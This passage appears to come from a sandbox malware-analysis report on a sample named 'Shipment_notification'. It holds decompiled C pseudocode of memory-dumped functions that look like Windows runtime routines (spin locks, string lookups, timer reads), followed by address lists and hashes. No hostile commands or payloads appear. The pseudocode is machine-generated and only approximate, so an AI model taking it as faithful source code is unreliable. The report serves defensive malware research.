										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E01B295D0();
										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E01B1F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                0x01ae52a5
                                                                                0x01ae52ad
                                                                                0x01ae52b0
                                                                                0x01ae52b3
                                                                                0x01ae52b7
                                                                                0x01ae52ba
                                                                                0x01ae52bf
                                                                                0x01ae52c4
                                                                                0x01ae52cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae52ce
                                                                                0x01ae52d9
                                                                                0x01ae52dd
                                                                                0x01ae52e7
                                                                                0x01ae52f7
                                                                                0x01ae52f9
                                                                                0x01ae52fd
                                                                                0x01b40dcf
                                                                                0x01b40dd5
                                                                                0x01b40dd6
                                                                                0x01b40dd7
                                                                                0x01b40dd8
                                                                                0x01b40dd9
                                                                                0x01b40dde
                                                                                0x01b40ddf
                                                                                0x01b40de0
                                                                                0x01b40de1
                                                                                0x01b40de2
                                                                                0x01b40de5
                                                                                0x01b40dea
                                                                                0x01b40dec
                                                                                0x01b40f60
                                                                                0x01b40f64
                                                                                0x01b40f70
                                                                                0x01b40f76
                                                                                0x01b40f79
                                                                                0x01b40f79
                                                                                0x00000000
                                                                                0x01b40f64
                                                                                0x01b40df2
                                                                                0x01b40df7
                                                                                0x01b40e04
                                                                                0x01b40e0d
                                                                                0x01b40e0d
                                                                                0x01b40e10
                                                                                0x01b40e1a
                                                                                0x01b40e1c
                                                                                0x01b40e4c
                                                                                0x01b40e52
                                                                                0x01b40e61
                                                                                0x01b40e67
                                                                                0x01b40e6b
                                                                                0x01b40e70
                                                                                0x01b40e76
                                                                                0x01b40ed7
                                                                                0x01b40edc
                                                                                0x01b40ee0
                                                                                0x01b40ee6
                                                                                0x01b40eea
                                                                                0x01b40eed
                                                                                0x01b40ef0
                                                                                0x01b40ef3
                                                                                0x01b40ef6
                                                                                0x01b40ef9
                                                                                0x01b40efe
                                                                                0x01b40f01
                                                                                0x01b40f01
                                                                                0x01b40f0b
                                                                                0x01b40f12
                                                                                0x01b40f16
                                                                                0x01b40f18
                                                                                0x01b40f1b
                                                                                0x01b40f2c
                                                                                0x01b40f31
                                                                                0x01b40f31
                                                                                0x01b40f35
                                                                                0x01b40f39
                                                                                0x01b40f3a
                                                                                0x01b40f3c
                                                                                0x01b40f3f
                                                                                0x01b40f50
                                                                                0x01b40f55
                                                                                0x01b40f55
                                                                                0x01b40f59
                                                                                0x01ae52eb
                                                                                0x01ae52f1
                                                                                0x01ae52f1
                                                                                0x01b40e7d
                                                                                0x01b40e84
                                                                                0x01b40e88
                                                                                0x01b40e8a
                                                                                0x01b40e8d
                                                                                0x01b40e9e
                                                                                0x01b40ea3
                                                                                0x01b40ea3
                                                                                0x01b40ea7
                                                                                0x01b40eaf
                                                                                0x01b40eb3
                                                                                0x01b40eb9
                                                                                0x01b40eb9
                                                                                0x01b40ebc
                                                                                0x01b40ecd
                                                                                0x01b40ecd
                                                                                0x00000000
                                                                                0x01b40eb3
                                                                                0x01b40e21
                                                                                0x01b40e2b
                                                                                0x01b40e2f
                                                                                0x01b40e30
                                                                                0x01b40e3a
                                                                                0x01b40e3f
                                                                                0x01b40e41
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b40e47
                                                                                0x00000000
                                                                                0x01b40e47
                                                                                0x01b40df9
                                                                                0x01b40dfe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b40dfe
                                                                                0x01ae5303
                                                                                0x01ae5307
                                                                                0x00000000
                                                                                0x01ae5309
                                                                                0x00000000
                                                                                0x01ae5309
                                                                                0x01ae5307
                                                                                0x01ae52e9
                                                                                0x01ae52e9
                                                                                0x00000000
                                                                                0x01ae52e9
                                                                                0x01ae530e
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 31f6eb88a42472d72276bfc2fa7faca6f6376ba20287f48c4a3678a720809ed7
                                                                                • Instruction ID: cef7c3a064fa0199fb44bbacc604f49d629ed8f180903f9bbe847985da026e79
                                                                                • Opcode Fuzzy Hash: 31f6eb88a42472d72276bfc2fa7faca6f6376ba20287f48c4a3678a720809ed7
                                                                                • Instruction Fuzzy Hash: A2515231205342AFD72AEF68C844B67BBE4FF50704F04495EF58983661EB70E804CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B12AE4 Relevance: .2, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B12AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1bd8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1bd8208; // 0x1bd8207
				_t8 = _t57 + 0x1bd8208; // 0x1bd8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1bd8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x1bd821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1bd6d5c; // 0x7fd40654
							_t72 =  *0x1bd6d5c; // 0x7fd40654
							_t75 =  *0x1bd6d5c; // 0x7fd40654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1bd6d5c; // 0x7fd40654
							_t84 =  *0x1bd6d5c; // 0x7fd40654
							_t87 =  *0x1bd6d5c; // 0x7fd40654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E01B2F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                0x01b12ae4
                                                                                0x01b12aec
                                                                                0x01b12aef
                                                                                0x01b12af4
                                                                                0x01b12af7
                                                                                0x01b12afd
                                                                                0x01b12b92
                                                                                0x01b12b92
                                                                                0x01b12b97
                                                                                0x01b12b9c
                                                                                0x01b12b9c
                                                                                0x01b12b03
                                                                                0x01b12b06
                                                                                0x01b12b09
                                                                                0x01b12b09
                                                                                0x01b12b0f
                                                                                0x01b12b15
                                                                                0x01b12b15
                                                                                0x01b12b1b
                                                                                0x01b12b1e
                                                                                0x01b12b21
                                                                                0x01b12b26
                                                                                0x01b12b29
                                                                                0x01b12b81
                                                                                0x01b12b84
                                                                                0x01b12c0e
                                                                                0x01b12c15
                                                                                0x01b12c24
                                                                                0x01b12c24
                                                                                0x01b12b8a
                                                                                0x01b12b8a
                                                                                0x01b12b8a
                                                                                0x01b12b8a
                                                                                0x01b12b90
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12b4a
                                                                                0x01b12b4a
                                                                                0x01b12b4d
                                                                                0x01b12b53
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12b55
                                                                                0x01b12b58
                                                                                0x01b12bb7
                                                                                0x01b55d1b
                                                                                0x01b55d37
                                                                                0x01b55d47
                                                                                0x01b55d53
                                                                                0x01b12bbd
                                                                                0x01b12bbd
                                                                                0x01b12bbd
                                                                                0x01b12bb7
                                                                                0x01b12b5d
                                                                                0x01b12c2f
                                                                                0x01b55d5b
                                                                                0x01b55d77
                                                                                0x01b55d87
                                                                                0x01b55d93
                                                                                0x01b12c35
                                                                                0x01b12c35
                                                                                0x01b12c35
                                                                                0x01b12c2f
                                                                                0x01b12b65
                                                                                0x01b12b9f
                                                                                0x01b12ba2
                                                                                0x01b12b67
                                                                                0x01b12b67
                                                                                0x01b12b69
                                                                                0x01b12b6b
                                                                                0x01b12b6e
                                                                                0x01b12bc9
                                                                                0x01b12bcc
                                                                                0x01b12bcf
                                                                                0x01b12bd4
                                                                                0x01b12bd6
                                                                                0x01b12bd6
                                                                                0x01b12bdb
                                                                                0x01b12c02
                                                                                0x01b12c05
                                                                                0x01b12c07
                                                                                0x00000000
                                                                                0x01b12c07
                                                                                0x01b12be0
                                                                                0x01b12c00
                                                                                0x01b12c3f
                                                                                0x01b12c3f
                                                                                0x00000000
                                                                                0x01b12c00
                                                                                0x01b12be5
                                                                                0x01b12be7
                                                                                0x01b12bec
                                                                                0x01b12bf4
                                                                                0x01b12bf6
                                                                                0x00000000
                                                                                0x01b12bf6
                                                                                0x01b12b70
                                                                                0x01b12b76
                                                                                0x01b12b2b
                                                                                0x01b12b2b
                                                                                0x01b12b2d
                                                                                0x01b12b2f
                                                                                0x01b12b32
                                                                                0x01b12b35
                                                                                0x01b12b3a
                                                                                0x00000000
                                                                                0x01b12b40
                                                                                0x01b12b43
                                                                                0x01b12b45
                                                                                0x01b12b47
                                                                                0x01b12b4a
                                                                                0x01b12b4d
                                                                                0x01b12b53
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12b53
                                                                                0x01b12b78
                                                                                0x01b12b78
                                                                                0x01b12b7b
                                                                                0x01b12b7e
                                                                                0x00000000
                                                                                0x01b12b7e
                                                                                0x01b12b76
                                                                                0x01b12ba5
                                                                                0x01b12ba5
                                                                                0x01b12ba8
                                                                                0x01b12bad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12baf
                                                                                0x01b12baf
                                                                                0x01b12bc2
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa6d9034862c4c60305f7e58cd1b391dca321f965c6a5e720328c49e19b0b43e
                                                                                • Instruction ID: 47fbd4124e64aa25bb93af9159d78f752283b6718bc58f1a111c04003cf99d8d
                                                                                • Opcode Fuzzy Hash: fa6d9034862c4c60305f7e58cd1b391dca321f965c6a5e720328c49e19b0b43e
                                                                                • Instruction Fuzzy Hash: 7151B376A00115CFCB1CCF5CC4909BEB7B1FB8870176685DAE846DB369E734AA51CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B0DBE9 Relevance: .1, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E01B0DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E01AECC50(E01AE4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01B07D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = L01BB8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01B02280(_t58, _v44);
						E01B0DD82(_v44, _t102, _t98);
						E01B0B944(_t102, _v5);
						return E01AFFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1bd8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x1bd862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1bd8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x1bd862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x1bafb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                0x01b0dbe9
                                                                                0x01b0dbf2
                                                                                0x01b0dbf7
                                                                                0x01b0dbf9
                                                                                0x01b0dbfc
                                                                                0x01b0dc00
                                                                                0x01b0dc03
                                                                                0x01b0dc14
                                                                                0x01b0dd54
                                                                                0x01b0dd54
                                                                                0x01b0dd54
                                                                                0x01b0dc18
                                                                                0x01b0dc1d
                                                                                0x01b0dc1d
                                                                                0x01b0dc32
                                                                                0x01b0dc3b
                                                                                0x01b0dc3e
                                                                                0x01b0dc46
                                                                                0x01b0dd5b
                                                                                0x01b0dd62
                                                                                0x01b0dd64
                                                                                0x01b0dd67
                                                                                0x01b0dd69
                                                                                0x01b0dd6b
                                                                                0x01b0dd6e
                                                                                0x01b0dd70
                                                                                0x01b0dd73
                                                                                0x01b0dd73
                                                                                0x00000000
                                                                                0x01b0dc4c
                                                                                0x01b0dc4e
                                                                                0x01b53ae3
                                                                                0x01b53ae8
                                                                                0x01b53aea
                                                                                0x01b0dce7
                                                                                0x01b0dce9
                                                                                0x01b0dcec
                                                                                0x01b0dcee
                                                                                0x01b0dcf0
                                                                                0x01b0dcf3
                                                                                0x01b0dcf5
                                                                                0x01b53af2
                                                                                0x01b53af5
                                                                                0x01b53af5
                                                                                0x01b0dd06
                                                                                0x01b0dd08
                                                                                0x01b0dd0b
                                                                                0x01b0dd12
                                                                                0x01b53b08
                                                                                0x01b0dd18
                                                                                0x01b0dd18
                                                                                0x01b0dd18
                                                                                0x01b0dd20
                                                                                0x01b0dd23
                                                                                0x01b53b16
                                                                                0x01b53b16
                                                                                0x01b0dd29
                                                                                0x01b0dd2d
                                                                                0x01b0dd36
                                                                                0x01b0dd40
                                                                                0x01b0dd51
                                                                                0x01b0dd51
                                                                                0x01b0dc54
                                                                                0x01b0dc59
                                                                                0x01b0dc59
                                                                                0x01b0dc5e
                                                                                0x01b0dc5e
                                                                                0x01b0dc63
                                                                                0x01b0dc66
                                                                                0x01b0dc6b
                                                                                0x01b0dc78
                                                                                0x01b0dc7b
                                                                                0x01b0dc81
                                                                                0x01b0dc81
                                                                                0x01b0dc83
                                                                                0x01b0dc89
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0dd7b
                                                                                0x01b0dd7b
                                                                                0x01b0dc8f
                                                                                0x01b0dc8f
                                                                                0x01b0dc92
                                                                                0x01b0dc99
                                                                                0x01b0dc9f
                                                                                0x01b0dca5
                                                                                0x01b0dcaa
                                                                                0x01b0dcaa
                                                                                0x01b0dcb3
                                                                                0x01b0dcb8
                                                                                0x01b0dcbb
                                                                                0x01b0dcc1
                                                                                0x01b0dccf
                                                                                0x01b0dcd2
                                                                                0x01b0dcd5
                                                                                0x01b0dcd7
                                                                                0x01b0dcda
                                                                                0x01b0dcdc
                                                                                0x01b0dcdc
                                                                                0x01b0dce2
                                                                                0x01b0dce4
                                                                                0x00000000
                                                                                0x01b0dce4

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 264922d3865a0ec0ab7fb85d63c630efdc67abace818be45c87c182117d719e5
                                                                                • Instruction ID: cb3613d870abbc60a1904c586afb818fcc56f8fce64af47b742f0313a1d859a3
                                                                                • Opcode Fuzzy Hash: 264922d3865a0ec0ab7fb85d63c630efdc67abace818be45c87c182117d719e5
                                                                                • Instruction Fuzzy Hash: 67519275A01605DFCB1ACFE8C49079DBFF1FB48310F24869AD555A7384DB31A944CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AFEF40 Relevance: .1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E01AFEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01AE9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7709c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01AE2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                0x01afef4b
                                                                                0x01afef4d
                                                                                0x01afef57
                                                                                0x01aff0bd
                                                                                0x01aff0c2
                                                                                0x01aff0d2
                                                                                0x01aff0d2
                                                                                0x01aff0c2
                                                                                0x01afef5d
                                                                                0x01afef5f
                                                                                0x01afef67
                                                                                0x01afef6a
                                                                                0x01afef6d
                                                                                0x01afef74
                                                                                0x01afef7f
                                                                                0x01afef82
                                                                                0x01afef82
                                                                                0x01afef86
                                                                                0x01afef88
                                                                                0x01afef8c
                                                                                0x01afef8f
                                                                                0x01afef8f
                                                                                0x01afef8f
                                                                                0x00000000
                                                                                0x01afef91
                                                                                0x01afef93
                                                                                0x01afefc4
                                                                                0x01afefc4
                                                                                0x01afefc4
                                                                                0x01afefca
                                                                                0x01afefd0
                                                                                0x01aff0a6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01aff0af
                                                                                0x01b4bb06
                                                                                0x01b4bb0a
                                                                                0x01aff0b5
                                                                                0x01aff0b5
                                                                                0x01aff0b5
                                                                                0x01aff0b5
                                                                                0x00000000
                                                                                0x01afefd6
                                                                                0x01afefd9
                                                                                0x01aff0de
                                                                                0x01aff0e2
                                                                                0x01afefdf
                                                                                0x01afefdf
                                                                                0x01afefdf
                                                                                0x01afefe5
                                                                                0x01b4bafc
                                                                                0x01b4bafc
                                                                                0x01afefe5
                                                                                0x01afefeb
                                                                                0x01afefed
                                                                                0x01aff00f
                                                                                0x01aff011
                                                                                0x01aff01a
                                                                                0x01aff01d
                                                                                0x01aff021
                                                                                0x01aff028
                                                                                0x01aff029
                                                                                0x01aff029
                                                                                0x01aff02c
                                                                                0x00000000
                                                                                0x01aff02c
                                                                                0x01afeff3
                                                                                0x01afeff9
                                                                                0x01aff0ea
                                                                                0x01aff0ed
                                                                                0x01aff0ef
                                                                                0x00000000
                                                                                0x01aff0ef
                                                                                0x01aff003
                                                                                0x01b4bb12
                                                                                0x01aff045
                                                                                0x01aff049
                                                                                0x01aff051
                                                                                0x01aff09e
                                                                                0x01aff0a0
                                                                                0x01aff0a0
                                                                                0x01aff09e
                                                                                0x01aff053
                                                                                0x01aff064
                                                                                0x01aff064
                                                                                0x01aff06b
                                                                                0x01b4bb1a
                                                                                0x01b4bb1a
                                                                                0x01aff071
                                                                                0x01aff071
                                                                                0x01aff07d
                                                                                0x01aff082
                                                                                0x01aff08f
                                                                                0x01aff08f
                                                                                0x01aff009
                                                                                0x01aff00d
                                                                                0x00000000
                                                                                0x01aff00d
                                                                                0x01afefd0
                                                                                0x01afef97
                                                                                0x01afefa5
                                                                                0x01afefaa
                                                                                0x00000000
                                                                                0x01afefac
                                                                                0x01afefac
                                                                                0x01afefac
                                                                                0x00000000
                                                                                0x01afefb2
                                                                                0x01aff036
                                                                                0x01aff03a
                                                                                0x01aff040
                                                                                0x01aff090
                                                                                0x00000000
